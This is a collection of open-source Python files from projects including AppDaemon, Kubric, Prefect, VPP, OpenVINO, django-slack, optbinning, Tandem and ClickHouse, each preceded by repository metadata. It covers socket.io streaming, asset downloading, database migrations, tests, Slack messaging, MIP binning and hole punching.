AppDaemon/appdaemon
|
60041128fa59c7cdf257b5603590a75602be19d4
|
02a45c36c0e4d22ae14e630e7e747406fad4b753
|
refs/heads/dev
| 2023-09-04T06:15:53.938410
| 2023-06-28T13:23:20
| 2023-06-28T13:23:20
| 63,267,110
| 319
| 155
|
NOASSERTION
| 2023-07-20T16:09:46
| 2016-07-13T17:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,634
|
py
|
socketio_handler.py
|
import socketio
import json
import traceback
import appdaemon.utils as utils
class SocketIOHandler:
def __init__(self, ADStream, app, path, ad):
self.AD = ad
self.ADStream = ADStream
self.app = app
self.path = path
self.logger = ad.logging.get_child("_stream")
self.access = ad.logging.get_access()
self.sio = socketio.AsyncServer(async_mode="aiohttp")
self.ns = NameSpace(self.ADStream, self.path, self.AD)
self.sio.register_namespace(self.ns)
self.sio.attach(self.app)
def makeStream(self, ad, request, **kwargs):
return SocketIOStream(ad, self.ns, request)
class NameSpace(socketio.AsyncNamespace):
def __init__(self, ADStream, path, AD):
super().__init__(path)
self.AD = AD
self.logger = AD.logging.get_child("_stream")
self.access = AD.logging.get_access()
self.ADStream = ADStream
async def on_down(self, sid, data):
self.logger.debug("IOSocket Down sid={} data={}".format(sid, data))
try:
msg = json.loads(data)
handler = self.ADStream.get_handler(sid)
await handler._on_message(msg)
except TypeError as e:
self.logger.debug("-" * 60)
self.logger.warning("Unexpected error in JSON conversion when reading from stream")
self.logger.debug("Data is: %s", data)
self.logger.debug("Error is: %s", e)
self.logger.debug("-" * 60)
except Exception:
self.logger.debug("-" * 60)
self.logger.debug("Client disconnected unexpectedly")
self.access.info("Client disconnected unexpectedly")
self.logger.debug("-" * 60)
self.logger.debug(traceback.format_exc())
self.logger.debug("-" * 60)
async def on_connect(self, sid, environ):
self.logger.debug("IOSocket Connect sid={} env={}".format(sid, environ))
await self.ADStream.on_connect({"sid": sid, "environ": environ})
async def on_disconnect(self, sid):
self.logger.debug("IOSocket disconnect sid={}".format(sid))
handler = self.ADStream.get_handler(sid)
await handler._on_disconnect()
class SocketIOStream:
def __init__(self, ad, namespace, request):
self.ns = namespace
self.client_id = request["sid"]
self.logger = ad.logging.get_child("_stream")
self.access = ad.logging.get_access()
self.client_name = None
def set_client_name(self, client_name):
self.client_name = client_name
async def run(self):
pass
async def sendclient(self, data):
self.logger.debug("IOSocket Send sid={} data={}".format(self.client_id, data))
data["client_id"] = self.client_id
try:
msg = utils.convert_json(data)
await self.ns.emit("up", msg, room=self.client_id)
except TypeError as e:
self.logger.debug("-" * 60)
self.logger.warning("Unexpected error in JSON conversion when writing to stream from %s", self.client_name)
self.logger.debug("Data is: %s", data)
self.logger.debug("Error is: %s", e)
self.logger.debug("-" * 60)
except Exception:
self.logger.debug("-" * 60)
self.logger.debug("Client disconnected unexpectedly from %s", self.client_name)
self.access.info("Client disconnected unexpectedly from %s", self.client_name)
self.logger.debug("-" * 60)
self.logger.debug(traceback.format_exc())
self.logger.debug("-" * 60)
|
9a11b1660128aec0ce51919fceb67bd9df3c0a1b
|
87597df3a60b0fc985b43d7a64cafa58ac9de339
|
/kubric/scripts/download_hdri_haven.py
|
112f035b371a3b9ddad59de2630e16032b74054e
|
[
"Apache-2.0"
] |
permissive
|
google-research/kubric
|
f139e72891c30d4330ab4e195b7fbe3b0f649a81
|
bb534357a0e3a316979bfc35900279737b3cbf26
|
refs/heads/main
| 2023-09-04T09:53:33.144226
| 2023-08-16T23:07:32
| 2023-08-16T23:07:32
| 281,770,989
| 1,947
| 183
|
Apache-2.0
| 2023-09-13T04:31:51
| 2020-07-22T19:56:38
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,418
|
py
|
download_hdri_haven.py
|
# Copyright 2023 The Kubric Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import copy
import functools
import logging
import multiprocessing
import pathlib
import shutil
import tarfile
import urllib.error
import urllib.parse
import urllib.request
import requests
import tqdm
from kubric import file_io
from kubric.kubric_typing import PathLike
def collect_list_of_available_assets(
catalogue_path="hdri_haven_catalogue.json"):
catalogue_path = file_io.as_path(catalogue_path)
if catalogue_path.exists():
return file_io.read_json(catalogue_path)
# Get a list of available assets
response = requests.get("https://api.polyhaven.com/assets?t=hdris")
catalogue = [
{"id": k,
"asset_type": "Texture",
"license": "CC0 1.0",
"url": "https://dl.polyhaven.org/file/ph-assets/HDRIs/hdr/4k/{name}_4k.hdr".format(
name=urllib.request.quote(k)),
"kwargs": {
},
"metadata": {
"authors": list(v["authors"].keys()),
"resolution": "4k",
"coords": v.get("coords"),
"date_taken": v["date_taken"],
"tags": v["tags"],
"categories": v["categories"],
},
} for k, v in response.json().items()]
file_io.write_json(catalogue, catalogue_path)
return catalogue
def download_asset(a, download_dir):
filename = pathlib.Path(urllib.parse.urlparse(a["url"]).path).name
download_dir = pathlib.Path(download_dir)
target_path = download_dir / filename
if not target_path.exists():
try:
opener = urllib.request.URLopener()
opener.addheader('User-Agent', 'Mozilla/5.0')
opener.retrieve(a["url"], target_path)
except (urllib.error.HTTPError, urllib.error.URLError) as e:
logging.warning(f"FAILED! skipping '{a['name']}'", e)
def download_all(assets_list, num_processes=16, download_dir='GSO_raw'):
download_dir = pathlib.Path(download_dir)
download_dir.mkdir(parents=True, exist_ok=True)
download_func = functools.partial(download_asset, download_dir=download_dir)
with tqdm.tqdm(total=len(assets_list)) as pbar:
with multiprocessing.Pool(num_processes, maxtasksperchild=1) as pool:
promise = pool.imap_unordered(download_func, assets_list)
for _ in promise:
pbar.update(1)
def kubricify(asset, source_dir, target_dir):
name = asset["id"]
source_dir = file_io.as_path(source_dir)
target_dir = file_io.as_path(target_dir)
hdri_source_path = source_dir / f"{name}_4k.hdr"
tmp_dir = target_dir / name
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
tmp_dir.mkdir(parents=True, exist_ok=False)
json_path = tmp_dir / "data.json"
tar_path = target_dir / f"{name}.tar.gz"
if tar_path.exists():
with tarfile.open(tar_path, "r:gz") as tar:
tar.extract("data.json", tmp_dir)
asset_entry = file_io.read_json(json_path)
if asset_entry and "id" in asset_entry:
shutil.rmtree(tmp_dir)
return asset_entry["id"], asset_entry
asset_entry = copy.deepcopy(asset)
del asset_entry["url"]
asset_entry["kwargs"]["filename"] = "environment_4k.hdr"
file_io.write_json(asset_entry, json_path)
with tarfile.open(tar_path, "w:gz") as tar:
tar.add(hdri_source_path, asset_entry["kwargs"]["filename"])
tar.add(json_path, "data.json")
shutil.rmtree(tmp_dir)
return name, asset_entry
def main(
download_dir: PathLike = "GSO_raw",
target_dir: PathLike = "GSO",
keep_raw_assets=False
):
download_dir = file_io.as_path(download_dir)
target_dir = file_io.as_path(target_dir)
catalogue = collect_list_of_available_assets()
download_all(catalogue, download_dir=download_dir)
assets = {}
with tqdm.tqdm(total=len(catalogue)) as pbar:
with multiprocessing.Pool(32, maxtasksperchild=1) as pool:
promise = pool.imap_unordered(functools.partial(kubricify,
source_dir=download_dir,
target_dir=target_dir),
catalogue)
for name, entry in promise:
assets[name] = entry
pbar.update(1)
manifest_path = "HDRI_haven.json"
manifest = {
"name": "HDRI_haven",
"data_dir": str(target_dir),
"version": "1.0",
"assets": assets
}
file_io.write_json(manifest, manifest_path)
if not keep_raw_assets:
logging.info("Deleting the raw (unconverted) assets...")
shutil.rmtree(download_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--download_dir", type=str, default="HDRI_haven_raw")
parser.add_argument("--target_dir", type=str, default="HDRI_haven")
parser.add_argument("--keep_raw_assets", type=bool, default=False)
FLAGS, unused = parser.parse_known_args()
main(download_dir=FLAGS.download_dir, target_dir=FLAGS.target_dir,
keep_raw_assets=FLAGS.keep_raw_assets)
|
4c6c309e2d729e3d5a5f15524bb43b63ce44f704
|
abe6c00f9790df7e6ef20dc02d0b1b225b5020cb
|
/src/prefect/server/database/migrations/versions/sqlite/2022_10_19_155810_af52717cf201_track_retries_restarts.py
|
ca6a58aa802522f4c17add1cd903bdf5676d0961
|
[
"Apache-2.0"
] |
permissive
|
PrefectHQ/prefect
|
000e6c5f7df80f76a181f0a30f8661c96417c8bd
|
2c50d2b64c811c364cbc5faa2b5c80a742572090
|
refs/heads/main
| 2023-09-05T20:25:42.965208
| 2023-09-05T18:58:06
| 2023-09-05T18:58:06
| 139,199,684
| 12,917
| 1,539
|
Apache-2.0
| 2023-09-14T20:25:45
| 2018-06-29T21:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 771
|
py
|
2022_10_19_155810_af52717cf201_track_retries_restarts.py
|
"""Add retry and restart metadata
Revision ID: af52717cf201
Revises: ad4b1b4d1e9d
Create Date: 2022-10-19 15:58:10.016251
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "af52717cf201"
down_revision = "3ced59d8806b"
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table("task_run", schema=None) as batch_op:
batch_op.add_column(
sa.Column(
"flow_run_run_count", sa.Integer(), server_default="0", nullable=False
)
)
# ### end Alembic commands ###
def downgrade():
with op.batch_alter_table("task_run", schema=None) as batch_op:
batch_op.drop_column("flow_run_run_count")
# ### end Alembic commands ###
|
818c43e24a4782428bda8d02fe115827887757f4
|
e1cddfd754d952134e72dfd03522c5ea4fb6008e
|
/test/asf/test_bihash.py
|
24639bd7a3b15707430c579e43963e3f8390ccf0
|
[
"Apache-2.0"
] |
permissive
|
FDio/vpp
|
0ad30fa1bec2975ffa6b66b45c9f4f32163123b6
|
f234b0d4626d7e686422cc9dfd25958584f4931e
|
refs/heads/master
| 2023-08-31T16:09:04.068646
| 2022-03-14T09:49:15
| 2023-08-31T09:50:00
| 96,556,718
| 1,048
| 630
|
Apache-2.0
| 2023-06-21T05:39:17
| 2017-07-07T16:29:40
|
C
|
UTF-8
|
Python
| false
| false
| 2,201
|
py
|
test_bihash.py
|
#!/usr/bin/env python3
import unittest
from config import config
from asfframework import VppTestCase, VppTestRunner
from vpp_ip_route import VppIpTable, VppIpRoute, VppRoutePath
class TestBihash(VppTestCase):
"""Bihash Test Cases"""
@classmethod
def setUpClass(cls):
# increase vapi timeout, to avoid spurious "test bihash ..."
# failures reported on aarch64 w/ test-debug
cls.vapi_response_timeout = 20
super(TestBihash, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestBihash, cls).tearDownClass()
def setUp(self):
super(TestBihash, self).setUp()
def tearDown(self):
super(TestBihash, self).tearDown()
def test_bihash_unittest(self):
"""Bihash Add/Del Test"""
error = self.vapi.cli("test bihash careful 0 verbose 0")
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
def test_bihash_thread(self):
"""Bihash Thread Test"""
error = self.vapi.cli(
"test bihash threads 2 nbuckets" + " 64000 careful 0 verbose 0"
)
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
def test_bihash_vec64(self):
"""Bihash vec64 Test"""
error = self.vapi.cli("test bihash vec64")
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
@unittest.skipUnless(config.gcov, "part of code coverage tests")
def test_bihash_coverage(self):
"""Improve Code Coverage"""
error = self.vapi.cli(
"test bihash nitems 10 ncycles 3"
+ "search 2 careful 1 verbose 2 non-random-keys"
)
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
error = self.vapi.cli(
"test bihash nitems 10 nbuckets 1 ncycles 3"
+ "search 2 careful 1 verbose 2 non-random-keys"
)
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
if __name__ == "__main__":
unittest.main(testRunner=VppTestRunner)
|
64d274be1febe1c9b10fe0b80a2d3c2d43ed1608
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tests/layer_tests/pytorch_tests/test_stack.py
|
670033c7b294c198d4317e100ea0c045f2d9033f
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 2,423
|
py
|
test_stack.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
import pytest
from pytorch_layer_test_class import PytorchLayerTest
class TestStack2D(PytorchLayerTest):
def _prepare_input(self):
return self.input_tensors
def create_model(self, dim):
import torch
class aten_stack(torch.nn.Module):
def __init__(self, dim):
super(aten_stack, self).__init__()
self.dim = dim
def forward(self, x, y):
inputs = [x, y]
return torch.stack(inputs, self.dim)
ref_net = None
return aten_stack(dim), ref_net, "aten::stack"
@pytest.mark.parametrize("input_tensor", ([
[np.random.rand(1, 3, 3), np.random.rand(1, 3, 3)],
[np.random.rand(4, 4, 2), np.random.rand(4, 4, 2)],
[np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9)]
]))
@pytest.mark.parametrize("dim", ([
0, 1, 2,
]))
@pytest.mark.nightly
@pytest.mark.precommit
def test_stack2D(self, input_tensor, dim, ie_device, precision, ir_version):
self.input_tensors = input_tensor
self._test(*self.create_model(dim), ie_device, precision, ir_version)
class TestStack3D(PytorchLayerTest):
def _prepare_input(self):
return self.input_tensors
def create_model(self, dim):
import torch
class aten_stack(torch.nn.Module):
def __init__(self, dim):
super(aten_stack, self).__init__()
self.dim = dim
def forward(self, x, y, z):
inputs = [x, y, z]
return torch.stack(inputs, self.dim)
ref_net = None
return aten_stack(dim), ref_net, "aten::stack"
@pytest.mark.parametrize("input_tensor", ([
[np.random.rand(1, 3, 3), np.random.rand(1, 3, 3), np.random.rand(1, 3, 3)],
[np.random.rand(4, 4, 2), np.random.rand(4, 4, 2), np.random.rand(4, 4, 2)],
[np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9)]
]))
@pytest.mark.parametrize("dim", ([
0, 1, 2,
]))
@pytest.mark.nightly
@pytest.mark.precommit
def test_stack3D(self, input_tensor, dim, ie_device, precision, ir_version):
self.input_tensors = input_tensor
self._test(*self.create_model(dim), ie_device, precision, ir_version)
|
627bb11be9d78307e71d667177cf9c32bafe2d17
|
a702fb476539272b78328f64a3a49c1012ac3ed4
|
/django_slack/api.py
|
2a3997f7cd8a6dbe24f855cef316b7e90a915e13
|
[
"BSD-3-Clause"
] |
permissive
|
lamby/django-slack
|
7f8dea40e5b3cad93f2e207b2815327993743774
|
5b92410fadc1a91b9415c0991f0ff2547cd633c7
|
refs/heads/master
| 2023-03-10T23:54:17.789584
| 2023-03-02T08:07:43
| 2023-03-02T08:07:43
| 27,838,503
| 250
| 88
|
BSD-3-Clause
| 2023-03-01T15:08:41
| 2014-12-10T20:34:18
|
Python
|
UTF-8
|
Python
| false
| false
| 5,595
|
py
|
api.py
|
import json
from django.conf import settings
from django.utils.encoding import force_str
from django.template.loader import render_to_string
from .utils import get_backend
from .app_settings import app_settings
def slack_message(
template,
context=None,
attachments=None,
blocks=None,
fail_silently=None,
**kwargs,
):
data = {}
channel = kwargs.pop('channel', app_settings.CHANNEL)
backend = get_backend(name=kwargs.pop('backend', None))
unfurl_links = kwargs.pop('unfurl_links', True)
unfurl_media = kwargs.pop('unfurl_media', True)
link_names = kwargs.pop('link_names', False)
thread_ts = kwargs.pop('thread_ts', None)
context = dict(context or {}, settings=settings)
if fail_silently is None:
fail_silently = app_settings.FAIL_SILENTLY
NOT_REQUIRED, DEFAULT_ENDPOINT, ALWAYS = range(3)
PARAMS = {
'text': {'default': '', 'required': NOT_REQUIRED,}, # Checked later
'token': {
'default': app_settings.TOKEN,
'required': DEFAULT_ENDPOINT,
},
'channel': {'default': channel, 'required': DEFAULT_ENDPOINT,},
'icon_url': {
'default': app_settings.ICON_URL,
'required': NOT_REQUIRED,
},
'icon_emoji': {
'default': app_settings.ICON_EMOJI,
'required': NOT_REQUIRED,
},
'username': {
'default': app_settings.USERNAME,
'required': NOT_REQUIRED,
},
'attachments': {
'default': attachments,
'render': False,
'required': NOT_REQUIRED,
},
'blocks': {
'default': blocks,
'render': False,
'required': NOT_REQUIRED,
},
'endpoint_url': {
'default': app_settings.ENDPOINT_URL,
'render': ALWAYS,
'required': NOT_REQUIRED,
},
'as_user': {
'default': app_settings.AS_USER,
'render': False,
'required': NOT_REQUIRED,
},
'unfurl_links': {
'default': unfurl_links,
'render': False,
'required': NOT_REQUIRED,
},
'unfurl_media': {
'default': unfurl_media,
'render': False,
'required': NOT_REQUIRED,
},
'link_names': {
'default': link_names,
'render': False,
'required': NOT_REQUIRED,
},
'thread_ts': {
'default': thread_ts,
'render': False,
'required': NOT_REQUIRED,
},
}
for k, v in PARAMS.items():
# First, set from default if we have one (i.e. it is truthy,
# or, for boolean values, the value is explicitly set to False).
# We do this so blocks are set properly to null when text is
# set, but if unfurl_links or unfurl_media is False, they are
# still passed to the endpoint as parameters
if v['default'] or v['default'] is False:
data[k] = v['default']
# Render template if necessary
if v.get('render', True):
try:
val = force_str(
render_to_string(
template,
dict(
context, django_slack='django_slack/{}'.format(k),
),
).strip()
)
except Exception:
if fail_silently:
return
raise
if val:
data[k] = val
# Check if paramater is required
if v['required'] == ALWAYS:
if data.get(k, None):
continue
if fail_silently:
return
raise ValueError(
"Missing or empty required parameter: {}".format(k)
)
if 'text' not in data and 'attachments' not in data:
raise ValueError(
"text parameter is required if attachments is not set",
)
# Ensure that as_user is either "true" or not present (rather than "True"
# or "False", etc.).
#
# This also prevents an encoding error under (just) Django 2.1 due to an
# upstream regression (<https://github.com/lamby/django-slack/issues/85>).
#
if data.pop('as_user', app_settings.AS_USER):
data['as_user'] = 'true'
# The endpoint URL is not part of the data payload but as we construct it
# within `data` we must remove it.
endpoint_url = data.pop('endpoint_url')
# If a custom endpoint URL was specified then we need to wrap it, otherwise
# we need to ensure attachments are encoded.
if endpoint_url == app_settings.DEFAULT_ENDPOINT_URL:
# Check parameters that are only required if we don't specify a custom
# endpoint URL.
for k, v in PARAMS.items():
if v['required'] != DEFAULT_ENDPOINT:
continue
if not data.get(k, None):
if fail_silently:
return
raise ValueError(
"{} parameter is required if custom endpoint URL is not "
"specified".format(k),
)
for x in ('attachments', 'blocks'):
if x in data:
data[x] = json.dumps(data[x])
else:
data = {'payload': json.dumps(data)}
try:
return backend.send(endpoint_url, data, **kwargs)
except Exception:
if not fail_silently:
raise
|
fa86121089319c2401973498a35e5957cbe922f0
|
8e6203db7383475f1c24a590f0456330b969bb4b
|
/optbinning/binning/multidimensional/mip_2d.py
|
e3113275f0291d87407cf6e39fe8197087f4bbcd
|
[
"Apache-2.0"
] |
permissive
|
guillermo-navas-palencia/optbinning
|
6fdfc764a214052b4d7d8e0b59114f0a63e6d5a8
|
73aee82008ebe88b732430e7c5764da57fb4d3ae
|
refs/heads/master
| 2023-08-28T13:33:43.536143
| 2023-08-22T19:20:18
| 2023-08-22T19:20:18
| 231,076,826
| 377
| 91
|
Apache-2.0
| 2023-09-05T20:14:14
| 2019-12-31T11:17:44
|
Python
|
UTF-8
|
Python
| false
| false
| 7,663
|
py
|
mip_2d.py
|
"""
Generalized assigment problem: solve constrained optimal 2D binning problem.
Mixed-Integer programming implementation.
"""
# Guillermo Navas-Palencia <g.navas.palencia@gmail.com>
# Copyright (C) 2021
import numpy as np
from ortools.linear_solver import pywraplp
class Binning2DMIP:
def __init__(self, monotonic_trend_x, monotonic_trend_y, min_n_bins,
max_n_bins, min_diff_x, min_diff_y, gamma, n_jobs,
time_limit):
self.monotonic_trend_x = monotonic_trend_x
self.monotonic_trend_y = monotonic_trend_y
self.min_n_bins = min_n_bins
self.max_n_bins = max_n_bins
self.min_diff_x = min_diff_x
self.min_diff_y = min_diff_y
self.gamma = gamma
self.n_jobs = n_jobs
self.time_limit = time_limit
self.solver_ = None
self.event_rate_ = None
self.iv_ = None
self._model = None
self._x = None
self._n_rectangles = None
def build_model(self, n_grid, n_rectangles, cols, c, d_connected_x,
d_connected_y, er, n_records):
# Initialize solver
solver = pywraplp.Solver(
'BinningMIP', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)
# Decision variables
x, d = self.decision_variables(solver, n_rectangles)
# Objective function
if self.gamma:
total_records = int(n_records.sum())
regularization = self.gamma / total_records
pmax = solver.NumVar(0, total_records, "pmax")
pmin = solver.NumVar(0, total_records, "pmin")
solver.Maximize(
solver.Sum([c[i] * x[i] for i in range(n_rectangles)]) -
regularization * (pmax - pmin))
else:
solver.Maximize(
solver.Sum([c[i] * x[i] for i in range(n_rectangles)]))
# Constraint: unique assignment
self.add_constraint_unique_assignment(solver, x, n_grid, cols)
# Constraint: min / max bins
self.add_constraint_min_max_bins(solver, n_rectangles, x, d)
# Constraint: monotonicity
self.add_constraint_monotonic(
solver, n_rectangles, x, er, d_connected_x, d_connected_y,
self.min_diff_x, self.min_diff_y)
# Constraint: reduction of dominating bins
if self.gamma:
for i in range(n_rectangles):
bin_size = n_records[i] * x[i]
solver.Add(pmin <= total_records * (1 - x[i]) + bin_size)
solver.Add(pmax >= bin_size)
solver.Add(pmin <= pmax)
# Save data for post-processing
self.solver_ = solver
self._x = x
self._n_rectangles = n_rectangles
def solve(self):
# Solve
self.solver_.SetTimeLimit(self.time_limit * 1000)
self.solver_.SetNumThreads(self.n_jobs)
status = self.solver_.Solve()
if status in (pywraplp.Solver.OPTIMAL, pywraplp.Solver.FEASIBLE):
if status == pywraplp.Solver.OPTIMAL:
status_name = "OPTIMAL"
else:
status_name = "FEASIBLE"
solution = np.array([self._x[i].solution_value()
for i in range(self._n_rectangles)])
solution = solution.astype(bool)
else:
if status == pywraplp.Solver.ABNORMAL:
status_name = "ABNORMAL"
elif status == pywraplp.Solver.INFEASIBLE:
status_name = "INFEASIBLE"
elif status == pywraplp.Solver.UNBOUNDED:
status_name = "UNBOUNDED"
else:
status_name = "UNKNOWN"
solution = np.zeros(self._n_rectangles).astype(bool)
return status_name, solution
def decision_variables(self, solver, n_rectangles):
x = {}
for i in range(n_rectangles):
x[i] = solver.BoolVar("x[{}]".format(i))
d = None
if self.min_n_bins is not None and self.max_n_bins is not None:
n_bin_diff = self.max_n_bins - self.min_n_bins
# Range constraints auxiliary variables
d = solver.NumVar(0, n_bin_diff, "n_bin_diff")
return x, d
def add_constraint_unique_assignment(self, solver, x, n_grid, cols):
for j in range(n_grid):
solver.Add(solver.Sum([x[i] for i in cols[j]]) == 1)
def add_constraint_min_max_bins(self, solver, n_rectangles, x, d):
if self.min_n_bins is not None or self.max_n_bins is not None:
n_bins = solver.Sum([x[i] for i in range(n_rectangles)])
if self.min_n_bins is not None and self.max_n_bins is not None:
solver.Add(d + n_bins - self.max_n_bins == 0)
elif self.min_n_bins is not None:
solver.Add(n_bins >= self.min_n_bins)
elif self.max_n_bins is not None:
solver.Add(n_bins <= self.max_n_bins)
def add_constraint_monotonic(self, solver, n_rectangles, x, er,
d_connected_x, d_connected_y, min_diff_x,
min_diff_y):
if (self.monotonic_trend_x is not None and
self.monotonic_trend_y is not None):
for i in range(n_rectangles):
ind_x = []
ind_y = []
for j in d_connected_x[i]:
if self.monotonic_trend_x == "ascending":
if er[i] + min_diff_x >= er[j]:
ind_x.append(j)
elif self.monotonic_trend_x == "descending":
if er[i] <= er[j] + min_diff_x:
ind_x.append(j)
if ind_x:
solver.Add(solver.Sum([x[j] for j in ind_x]) <=
len(ind_x) * (1 - x[i]))
for j in d_connected_y[i]:
if self.monotonic_trend_y == "ascending":
if er[i] + min_diff_y >= er[j]:
ind_y.append(j)
elif self.monotonic_trend_y == "descending":
if er[i] <= er[j] + min_diff_y:
ind_y.append(j)
if ind_y:
solver.Add(solver.Sum([x[j] for j in ind_y]) <=
len(ind_y) * (1 - x[i]))
elif self.monotonic_trend_x is not None:
for i in range(n_rectangles):
ind_x = []
for j in d_connected_x[i]:
if self.monotonic_trend_x == "ascending":
if er[i] + min_diff_x >= er[j]:
ind_x.append(j)
elif self.monotonic_trend_x == "descending":
if er[i] <= er[j] + min_diff_x:
ind_x.append(j)
if ind_x:
solver.Add(solver.Sum([x[j] for j in ind_x]) <=
len(ind_x) * (1 - x[i]))
elif self.monotonic_trend_y is not None:
for i in range(n_rectangles):
ind_y = []
for j in d_connected_y[i]:
if self.monotonic_trend_y == "ascending":
if er[i] + min_diff_y >= er[j]:
ind_y.append(j)
elif self.monotonic_trend_y == "descending":
if er[i] <= er[j] + min_diff_y:
ind_y.append(j)
if ind_y:
solver.Add(solver.Sum([x[j] for j in ind_y]) <=
len(ind_y) * (1 - x[i]))
|
c0e864939d5b1e74a62b232eec4e3b6100e226c9
|
73a63ce92e2eab1973ac136dfe453bd6945f56f8
|
/agent/tandem/agent/utils/hole_punching.py
|
8a9ead998c3adc5521c23cda0b16723d03f5d35c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
typeintandem/tandem
|
5791af34c7d023c40297fa8ba4d66103d5ac78c5
|
81e76f675634f1b42c8c3070c73443f3f68f8624
|
refs/heads/master
| 2023-04-28T09:32:29.089076
| 2018-03-15T20:27:24
| 2018-03-15T20:27:24
| 91,004,353
| 746
| 24
|
Apache-2.0
| 2023-04-18T12:06:50
| 2017-05-11T17:10:31
|
Python
|
UTF-8
|
Python
| false
| false
| 951
|
py
|
hole_punching.py
|
from tandem.agent.protocol.messages.interagent import (
InteragentProtocolUtils,
Ping,
Syn,
)
class HolePunchingUtils:
PING_INTERVAL = 0.15
SYN_INTERVAL = 0.15
TIMEOUT = 3
@staticmethod
def generate_send_ping(gateway, addresses, id):
def send_ping():
HolePunchingUtils._send_message(
gateway,
addresses,
Ping(id=str(id)),
)
return send_ping
@staticmethod
def generate_send_syn(gateway, address):
def send_syn():
HolePunchingUtils._send_message(
gateway,
address,
Syn(),
)
return send_syn
@staticmethod
def _send_message(gateway, addresses, message):
io_data = gateway.generate_io_data(
InteragentProtocolUtils.serialize(message),
addresses,
)
gateway.write_io_data(io_data)
|
961bc6847a34220b5b5bf2682e1ed13dad732e14
|
057a475216e9beed41983481aafcaf109bbf58da
|
/tests/integration/test_fetch_partition_should_reset_mutation/test.py
|
7037393a3d26298f682df14d32fd444299e85001
|
[
"Apache-2.0"
] |
permissive
|
ClickHouse/ClickHouse
|
fece5204263a5b4d693854b6039699265f1bb27f
|
6649328db809d51a694c358571539bc5820464be
|
refs/heads/master
| 2023-08-31T18:48:36.615225
| 2023-08-31T17:51:24
| 2023-08-31T17:51:24
| 60,246,359
| 23,878
| 5,449
|
Apache-2.0
| 2023-09-14T20:10:52
| 2016-06-02T08:28:18
|
C++
|
UTF-8
|
Python
| false
| false
| 2,429
|
py
|
test.py
|
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance(
"node", main_configs=["configs/zookeeper_config.xml"], with_zookeeper=True
)
@pytest.fixture(scope="module")
def start_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def test_part_should_reset_mutation(start_cluster):
node.query(
"CREATE TABLE test (i Int64, s String) ENGINE = ReplicatedMergeTree('/clickhouse/tables/test', 'node') ORDER BY i;"
)
node.query("INSERT INTO test SELECT 1, 'a'")
node.query("optimize table test final")
node.query("optimize table test final")
expected = TSV("""all_0_0_2\t1\ta""")
assert TSV(node.query("SELECT _part, * FROM test")) == expected
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
node.query(
"ALTER TABLE test UPDATE s='xxx' WHERE 1", settings={"mutations_sync": "2"}
)
expected = TSV("""all_0_0_2_4\t1\txxx""")
assert TSV(node.query("SELECT _part, * FROM test")) == expected
node.query(
"CREATE TABLE restore (i Int64, s String) ENGINE = ReplicatedMergeTree('/clickhouse/tables/restore', 'node') ORDER BY i;"
)
node.query(
"ALTER TABLE restore FETCH PARTITION tuple() FROM '/clickhouse/tables/test/'"
)
node.query("ALTER TABLE restore ATTACH PART 'all_0_0_2_4'")
node.query("INSERT INTO restore select 2, 'a'")
print(TSV(node.query("SELECT _part, * FROM restore")))
expected = TSV("""all_0_0_0\t1\txxx\nall_1_1_0\t2\ta""")
assert TSV(node.query("SELECT _part, * FROM restore ORDER BY i")) == expected
node.query(
"ALTER TABLE restore UPDATE s='yyy' WHERE 1", settings={"mutations_sync": "2"}
)
expected = TSV("""all_0_0_0_2\t1\tyyy\nall_1_1_0_2\t2\tyyy""")
assert TSV(node.query("SELECT _part, * FROM restore ORDER BY i")) == expected
node.query("ALTER TABLE restore DELETE WHERE 1", settings={"mutations_sync": "2"})
assert node.query("SELECT count() FROM restore").strip() == "0"
|
6dedb73429743ead3090ab57a37ccc65fb73de78
|
4edd01a0d66f6f3336f7396cec13f5da671a8dcb
|
/cmdstanpy/stanfit/__init__.py
|
6a7dd7caab2d805b32c177c8fecf02fd66b1b572
|
[
"BSD-3-Clause"
] |
permissive
|
stan-dev/cmdstanpy
|
c0a33ca6d3a6f5e1486b797e5a402df6cc66c92c
|
